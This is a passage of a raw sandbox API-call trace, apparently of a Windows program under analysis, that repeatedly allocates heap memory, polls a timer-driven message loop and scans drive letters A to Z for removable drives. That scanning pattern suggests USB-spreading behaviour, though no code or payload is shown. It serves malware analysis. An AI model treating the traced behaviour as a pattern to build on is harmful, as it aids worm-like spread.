[0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0217.023] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0217.023] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.024] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0217.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.024] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0217.024] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0217.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.024] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.025] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.025] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.025] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.025] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.025] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.025] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.026] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.026] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.026] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.026] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.027] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.027] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.027] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.028] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.028] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.028] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.028] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.029] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.029] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.031] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.031] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.031] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.032] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.032] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.032] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.032] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.033] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.033] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.033] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.033] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.033] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.033] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.033] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.033] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.033] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.033] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0217.033] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.033] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.033] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.033] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.034] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.034] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.034] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.034] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.034] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.034] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.034] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.034] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.034] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0217.034] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0217.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0217.050] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.052] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.052] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.052] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.052] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.052] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0217.053] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.053] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.053] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.053] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.054] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0217.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0217.054] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.055] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.056] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.056] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.056] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.057] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.057] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.057] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.057] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.057] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.058] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.058] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.058] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.058] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.059] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.059] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.059] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.060] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.060] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.060] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.061] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.061] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.061] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.061] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.062] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.062] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.062] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0217.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.064] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.064] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.064] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.064] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.065] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0217.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0217.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0217.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0217.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0217.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.066] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.066] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.067] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.067] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0217.067] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.067] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.068] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.068] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.068] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.068] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.068] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.069] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.069] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.069] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.069] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.069] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.070] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.070] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.070] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.071] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.071] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.072] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.072] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.072] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.072] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.073] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.073] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.073] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.073] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.074] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.074] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0217.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.074] HeapFree (in: 